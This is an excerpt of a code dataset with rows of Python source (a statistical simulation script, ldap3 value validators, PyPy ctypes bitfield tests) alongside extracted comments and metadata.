if self._config.return_plain:
return translated_dict, metadata
if metadata is None:
return self.__unflatter.transform(translated_dict)
return self.__unflatter.transform(translated_dict, metadata)
| transformer/transformers/map_keys.py | 4,040 | The MapKeys is a complete dict re-designer.
It lets you rename the keys and also restructure the entire dict. Creating new nested data where there wasn't
and also flattening data that was previously nested is possible, all that preserving the data from the input
dictionary.
This is the configuration for the MapKeys transformer.
In order to call this transformer pass the name "map-keys" and a mapping dict.
The mapping is done in 4 major steps:
1. Flattens the data.
2. Metadata Replacers:
Some key mapping parameters are specified in the metadata. Keys that have placeholders like
${metadata_key} will be substituted by values on the specified metadata key.
3. Map Data.
In this moment the keys of the mapping inside config match the keys of the flat payload. That is, the
payload and self._config.mapping have matching keys. Maybe not all keys in payload are in
self._config.mapping, in which case we choose what to do with those extra keys with the config
self._config.preserve_unmapped. If the opposite happens, the self._config.mapping have keys not present
in the payload, the configuration self._config.ignore_missing_data chooses what should be done.
4. Unflattens the data.
:return: transformed and restructured data. | 1,261 | en | 0.850537 |
from warnings import simplefilter
simplefilter(action='ignore', category=FutureWarning)
import numpy as np
import argparse
import pandas as pd
from tqdm.auto import tqdm
from datetime import datetime
import seaborn as sns
import matplotlib.pyplot as plt
from utils.functions import compute_exact_tau, compute_exact_tau_distr
from models.toy_gmm_multid import ToyGMMMultiDLoader
model_dict = {
'gmm': ToyGMMMultiDLoader
}
def main(d_obs, run, rep, alpha, sample_size_obs, n_sampled_true_tau, debug=False, seed=7, verbose=False,
marginal=False, size_marginal=1000, size_check=10000):
# Changing values if debugging
rep = rep if not debug else 2
n_sampled_true_tau = n_sampled_true_tau if not debug else 10
model_obj = model_dict[run](d_obs=d_obs, marginal=marginal, size_marginal=size_marginal)
# Get the correct functions
grid_param = model_obj.grid
gen_obs_func = model_obj.sample_sim
gen_sample_func = model_obj.generate_sample
or_func = model_obj.compute_exact_or
t0_grid = model_obj.pred_grid
tp_func = model_obj.compute_exact_prob
t0_val = model_obj.true_param
# Loop over repetitions and classifiers
# Each time we train the different classifiers, we build the intervals and we record
# whether the point is in or not.
np.random.seed(seed)
out_val = []
out_cols = ['d_obs', 'run', 'rep', 'classifier', 'sample_size_obs', 't0_true_val', 'theta_0_current', 'on_true_t0',
'in_true_interval', 'size_true_int', 'true_entropy']
pbar = tqdm(total=rep, desc='Toy Example for Simulations, n=%s' % sample_size_obs)
for jj in range(rep):
# Creating sample to check entropy about
sample_check = gen_sample_func(sample_size=size_check, marginal=False)
theta_vec = sample_check[:, :model_obj.d]
x_vec = sample_check[:, (model_obj.d + 1):]
bern_vec = sample_check[:, model_obj.d]
true_prob_vec = tp_func(theta_vec=theta_vec, x_vec=x_vec)
entropy_est = -np.average([np.log(true_prob_vec[kk]) if el == 1
else np.log(1 - true_prob_vec[kk])
for kk, el in enumerate(bern_vec)])
# TRUE CONFIDENCE INTERVAL
# print('------ Calculate true Confidence Interval')
# Generates samples for each t0 values, so to be able to check both coverage and power
x_obs = gen_obs_func(sample_size=sample_size_obs, true_param=t0_val)
# # Calculate the true LRT value
tau_obs = np.array([compute_exact_tau(
or_func=or_func, x_obs=x_obs, t0_val=theta_0, t1_linspace=grid_param) for theta_0 in t0_grid])
tau_distr = np.apply_along_axis(arr=t0_grid.reshape(-1, model_obj.d), axis=1,
func1d=lambda t0: compute_exact_tau_distr(
gen_obs_func=gen_obs_func, or_func=or_func, t0_val=t0,
t1_linspace=grid_param, n_sampled=n_sampled_true_tau,
sample_size_obs=sample_size_obs, d_obs=model_obj.d_obs))
assert tau_distr.shape == (t0_grid.shape[0], n_sampled_true_tau)
quantile_pred_tau = np.quantile(a=tau_distr, q=alpha, axis=1)
true_interval = (tau_obs > quantile_pred_tau).astype(int)
true_interval_size = (np.sum(true_interval) / true_interval.shape[0])
# At this point all it's left is to record
for kk, theta_0_current in enumerate(t0_grid):
out_val.append([
d_obs, run, jj, 'Exact', sample_size_obs,
t0_val, theta_0_current, int(t0_val == theta_0_current),
true_interval[kk], true_interval_size, entropy_est
])
pbar.update(1)
# Saving the results
out_df = pd.DataFrame.from_records(data=out_val, index=range(len(out_val)), columns=out_cols)
out_dir = 'sims/classifier_power_multid/'
out_filename = 'truth_classifier_power_multid%s_%s_%srep_alpha%s_sampleobs%s_t0val%s_%ssampletau_%s.csv' % (
d_obs, run, rep, str(alpha).replace('.', '-'), sample_size_obs,
str(t0_val).replace('.', '-'), n_sampled_true_tau,
datetime.strftime(datetime.today(), '%Y-%m-%d')
)
out_df.to_csv(out_dir + out_filename)
# Print results
cov_df = out_df[out_df['on_true_t0'] == 1][['classifier', 'in_true_interval', 'true_entropy', 'size_true_int']]
print(cov_df.groupby(['classifier']).agg({'in_true_interval': [np.average],
'size_true_int': [np.average, np.std],
'true_entropy': [np.average, np.std]}))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', action="store", type=int, default=7,
help='Random State')
parser.add_argument('--d_obs', action="store", type=int, default=2,
help='Dimensionality of the observed data (feature space)')
parser.add_argument('--rep', action="store", type=int, default=10,
help='Number of Repetitions for calculating the Pinball loss')
parser.add_argument('--alpha', action="store", type=float, default=0.1,
help='Statistical confidence level')
parser.add_argument('--run', action="store", type=str, default='gmm',
help='Problem to run')
parser.add_argument('--debug', action='store_true', default=False,
help='If true, a very small value for the sample sizes is fit to make sure the'
'file can run quickly for debugging purposes')
parser.add_argument('--verbose', action='store_true', default=False,
help='If true, logs are printed to the terminal')
parser.add_argument('--sample_size_obs', action="store", type=int, default=10,
help='Sample size of the actual observed data.')
parser.add_argument('--n_sampled_true_tau', action="store", type=int, default=100,
help='Number of Monte Carlo samples for calculating distribution of tau sample.')
argument_parsed = parser.parse_args()
main(
d_obs=argument_parsed.d_obs,
run=argument_parsed.run,
rep=argument_parsed.rep,
alpha=argument_parsed.alpha,
debug=argument_parsed.debug,
sample_size_obs=argument_parsed.sample_size_obs,
seed=argument_parsed.seed,
verbose=argument_parsed.verbose,
n_sampled_true_tau=argument_parsed.n_sampled_true_tau
)
| acore/classifier_power_multid_truth.py | 6,642 | Changing values if debugging Get the correct functions Loop over repetitions and classifiers Each time we train the different classifiers, we build the intervals and we record whether the point is in or not. Creating sample to check entropy about TRUE CONFIDENCE INTERVAL print('------ Calculate true Confidence Interval') Generates samples for each t0 values, so to be able to check both coverage and power Calculate the true LRT value At this point all it's left is to record Saving the results Print results | 511 | en | 0.765837 |
"""
"""
# Created on 2016.08.09
#
# Author: Giovanni Cannata
#
# Copyright 2016, 2017 Giovanni Cannata
#
# This file is part of ldap3.
#
# ldap3 is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ldap3 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with ldap3 in the COPYING and COPYING.LESSER files.
# If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
from ... import SEQUENCE_TYPES, STRING_TYPES
from .formatters import format_time
# Validators return True if value is valid, False if value is not valid,
# or a value different from True and False that is a valid value to substitute to the input value
def check_type(input_value, value_type):
if isinstance(input_value, value_type):
return True
if isinstance(input_value, SEQUENCE_TYPES):
for value in input_value:
if not isinstance(value, value_type):
return False
return True
return False
def always_valid(name, input_value):
return True
def validate_generic_single_value(name, input_value):
if not isinstance(input_value, SEQUENCE_TYPES):
return True
if len(input_value) == 1:
return True
return False
def validate_integer(name, input_value):
return check_type(input_value, int)
def validate_bytes(name, input_value):
return check_type(input_value, bytes)
def validate_boolean(name, input_value):
# it could be a real bool or the string TRUE or FALSE, # only a single valued is allowed
if validate_generic_single_value(name, input_value):
if isinstance(input_value, SEQUENCE_TYPES):
input_value = input_value[0]
if isinstance(input_value, bool):
if input_value:
return 'TRUE'
else:
return 'FALSE'
if isinstance(input_value, STRING_TYPES):
if input_value.lower() == 'true':
return 'TRUE'
elif input_value.lower() == 'false':
return 'FALSE'
return False
def validate_time(name, input_value):
# if datetime object doesn't have a timezone it's considered local time and is adjusted to UTC
changed = False
sequence = True # indicates if a sequence must be returned
if not isinstance(input_value, SEQUENCE_TYPES):
sequence = False
input_value = [input_value]
valid_values = []
for element in input_value:
if isinstance(element, STRING_TYPES): # tries to check if it is already be a Generalized Time
if isinstance(format_time(element), datetime): # valid Generalized Time string
valid_values.append(element)
else:
return False
elif isinstance(element, datetime):
changed = True
if element.tzinfo: # a datetime with a timezone
valid_values.append(element.strftime('%Y%m%d%H%M%SZ%z'))
else: # datetime without timezone, assumed local and adjusted to UTC
offset = datetime.now() - datetime.utcnow()
valid_values.append((element - offset).strftime('%Y%m%d%H%M%SZ'))
else:
return False
if changed:
if sequence:
return valid_values
else:
return valid_values[0]
else:
return True
| lib/python2.7/site-packages/ldap3/protocol/formatters/validators.py | 3,893 | Created on 2016.08.09 Author: Giovanni Cannata Copyright 2016, 2017 Giovanni Cannata This file is part of ldap3. ldap3 is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. ldap3 is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with ldap3 in the COPYING and COPYING.LESSER files. If not, see <http://www.gnu.org/licenses/>. Validators return True if value is valid, False if value is not valid, or a value different from True and False that is a valid value to substitute to the input value it could be a real bool or the string TRUE or FALSE, only a single valued is allowed if datetime object doesn't have a timezone it's considered local time and is adjusted to UTC indicates if a sequence must be returned tries to check if it is already be a Generalized Time valid Generalized Time string a datetime with a timezone datetime without timezone, assumed local and adjusted to UTC | 1,320 | en | 0.867289 |
import py
from ctypes import *
from support import BaseCTypesTestChecker
import os
import ctypes
signed_int_types = (c_byte, c_short, c_int, c_long, c_longlong)
unsigned_int_types = (c_ubyte, c_ushort, c_uint, c_ulong, c_ulonglong)
int_types = unsigned_int_types + signed_int_types
def setup_module(mod):
import conftest
_ctypes_test = str(conftest.sofile)
func = CDLL(_ctypes_test).unpack_bitfields
func.argtypes = POINTER(BITS), c_char
mod.func = func
class BITS(Structure):
_fields_ = [("A", c_int, 1),
("B", c_int, 2),
("C", c_int, 3),
("D", c_int, 4),
("E", c_int, 5),
("F", c_int, 6),
("G", c_int, 7),
("H", c_int, 8),
("I", c_int, 9),
("M", c_short, 1),
("N", c_short, 2),
("O", c_short, 3),
("P", c_short, 4),
("Q", c_short, 5),
("R", c_short, 6),
("S", c_short, 7)]
class TestC:
def test_ints(self):
for i in range(512):
for name in "ABCDEFGHI":
b = BITS()
setattr(b, name, i)
assert (name, i, getattr(b, name)) == (name, i, func(byref(b), name))
def test_shorts(self):
for i in range(256):
for name in "MNOPQRS":
b = BITS()
setattr(b, name, i)
assert (name, i, getattr(b, name)) == (name, i, func(byref(b), name))
class TestBitField:
def test_longlong(self):
class X(Structure):
_fields_ = [("a", c_longlong, 1),
("b", c_longlong, 62),
("c", c_longlong, 1)]
assert sizeof(X) == sizeof(c_longlong)
x = X()
x.a, x.b, x.c = -1, 7, -1
assert (x.a, x.b, x.c) == (-1, 7, -1)
x = X()
x.a, x.b, x.c = -1, -7, -1
assert (x.a, x.b, x.c) == (-1, -7, -1)
def test_ulonglong(self):
class X(Structure):
_fields_ = [("a", c_ulonglong, 1),
("b", c_ulonglong, 62),
("c", c_ulonglong, 1)]
assert sizeof(X) == sizeof(c_longlong)
x = X()
assert (x.a, x.b, x.c) == (0, 0, 0)
x.a, x.b, x.c = 7, 2305843009213693953, 7
assert (x.a, x.b, x.c) == (1, 2305843009213693953, 1)
def test_signed(self):
for c_typ in signed_int_types:
class X(Structure):
_fields_ = [("dummy", c_typ),
("a", c_typ, 3),
("b", c_typ, 3),
("c", c_typ, 1)]
assert sizeof(X) == sizeof(c_typ)*2
x = X()
assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, 0, 0)
x.a = -1
assert (c_typ, x.a, x.b, x.c) == (c_typ, -1, 0, 0)
x.a, x.b = 0, -1
assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, -1, 0)
def test_unsigned(self):
for c_typ in unsigned_int_types:
class X(Structure):
_fields_ = [("a", c_typ, 3),
("b", c_typ, 3),
("c", c_typ, 1)]
assert sizeof(X) == sizeof(c_typ)
x = X()
assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, 0, 0)
x.a = -1
assert (c_typ, x.a, x.b, x.c) == (c_typ, 7, 0, 0)
x.a, x.b = 0, -1
assert (c_typ, x.a, x.b, x.c) == (c_typ, 0, 7, 0)
def fail_fields(self, *fields):
return self.get_except(type(Structure), "X", (),
{"_fields_": fields})
def test_nonint_types(self):
# bit fields are not allowed on non-integer types.
result = self.fail_fields(("a", c_char_p, 1))
assert result == (TypeError, 'bit fields not allowed for type c_char_p')
result = self.fail_fields(("a", c_void_p, 1))
assert result == (TypeError, 'bit fields not allowed for type c_void_p')
if c_int != c_long:
result = self.fail_fields(("a", POINTER(c_int), 1))
assert result == (TypeError, 'bit fields not allowed for type LP_c_int')
result = self.fail_fields(("a", c_char, 1))
assert result == (TypeError, 'bit fields not allowed for type c_char')
try:
c_wchar
except NameError:
pass
else:
result = self.fail_fields(("a", c_wchar, 1))
assert result == (TypeError, 'bit fields not allowed for type c_wchar')
class Dummy(Structure):
_fields_ = []
result = self.fail_fields(("a", Dummy, 1))
assert result == (TypeError, 'bit fields not allowed for type Dummy')
def test_single_bitfield_size(self):
for c_typ in int_types:
result = self.fail_fields(("a", c_typ, -1))
assert result == (ValueError, 'number of bits invalid for bit field')
result = self.fail_fields(("a", c_typ, 0))
assert result == (ValueError, 'number of bits invalid for bit field')
class X(Structure):
_fields_ = [("a", c_typ, 1)]
assert sizeof(X) == sizeof(c_typ)
class X(Structure):
_fields_ = [("a", c_typ, sizeof(c_typ)*8)]
assert sizeof(X) == sizeof(c_typ)
result = self.fail_fields(("a", c_typ, sizeof(c_typ)*8 + 1))
assert result == (ValueError, 'number of bits invalid for bit field')
def test_multi_bitfields_size(self):
class X(Structure):
_fields_ = [("a", c_short, 1),
("b", c_short, 14),
("c", c_short, 1)]
assert sizeof(X) == sizeof(c_short)
class X(Structure):
_fields_ = [("a", c_short, 1),
("a1", c_short),
("b", c_short, 14),
("c", c_short, 1)]
assert sizeof(X) == sizeof(c_short)*3
assert X.a.offset == 0
assert X.a1.offset == sizeof(c_short)
assert X.b.offset == sizeof(c_short)*2
assert X.c.offset == sizeof(c_short)*2
class X(Structure):
_fields_ = [("a", c_short, 3),
("b", c_short, 14),
("c", c_short, 14)]
assert sizeof(X) == sizeof(c_short)*3
assert X.a.offset == sizeof(c_short)*0
assert X.b.offset == sizeof(c_short)*1
assert X.c.offset == sizeof(c_short)*2
def get_except(self, func, *args, **kw):
try:
func(*args, **kw)
except Exception as detail:
import traceback
traceback.print_exc()
return detail.__class__, str(detail)
def test_mixed_1(self):
class X(Structure):
_fields_ = [("a", c_byte, 4),
("b", c_int, 4)]
if os.name in ("nt", "ce"):
assert sizeof(X) == sizeof(c_int)*2
else:
assert sizeof(X) == sizeof(c_int)
def test_mixed_2(self):
class X(Structure):
_fields_ = [("a", c_byte, 4),
("b", c_int, 32)]
assert sizeof(X) == sizeof(c_int)*2
def test_mixed_3(self):
class X(Structure):
_fields_ = [("a", c_byte, 4),
("b", c_ubyte, 4)]
assert sizeof(X) == sizeof(c_byte)
def test_anon_bitfields(self):
# anonymous bit-fields gave a strange error message
class X(Structure):
_fields_ = [("a", c_byte, 4),
("b", c_ubyte, 4)]
class Y(Structure):
_anonymous_ = ["_"]
_fields_ = [("_", X)]
def test_set_fields_attr(self):
class A(Structure):
pass
A._fields_ = [("a", c_byte),
("b", c_ubyte)]
def test_set_fields_attr_bitfields(self):
class A(Structure):
pass
A._fields_ = [("a", POINTER(A)),
("b", c_ubyte, 4)]
def test_set_fields_cycle_fails(self):
class A(Structure):
pass
import pytest
pytest.raises(AttributeError, """
A._fields_ = [("a", A)]
""")
| idea2/pypyjs-3/deps/pypy/pypy/module/test_lib_pypy/ctypes_tests/test_bitfields.py | 8,311 | bit fields are not allowed on non-integer types. anonymous bit-fields gave a strange error message | 98 | en | 0.763951 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.